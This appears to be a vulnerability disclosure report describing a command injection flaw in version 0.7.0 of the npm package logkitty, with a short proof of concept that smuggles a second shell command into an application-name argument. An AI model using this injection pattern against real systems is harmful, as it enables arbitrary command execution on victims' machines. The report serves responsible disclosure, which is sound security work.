I would like to report a RCE
issue in the logkitty
module.
It allows to execute arbitrary commands remotely inside the victim's PC
module name: logkitty
version:0.7.0
npm page: https://www.npmjs.com/package/logkitty
> Display pretty Android and iOS logs without Android Studio or Console.app, with intuitive Command Line Interface.
[170,222] downloads in the last week
The issue occurs because a user input
is formatted inside a command
that will be executed without any check. The issue arises here: https://github.com/zamotany/logkitty/blob/master/src/android/adb.ts#L55
HACKED
npm i logkitty # Install affected module
logkitty android app 'test; touch HACKED' # Note the *touch command* is inside the *'* (single quote), so it's an argument, while it will be executed anyway
HACKED
has been created :) {F754955}> Don’t format commands
using insecure user's inputs
:)
RCE
via command formatting on logkitty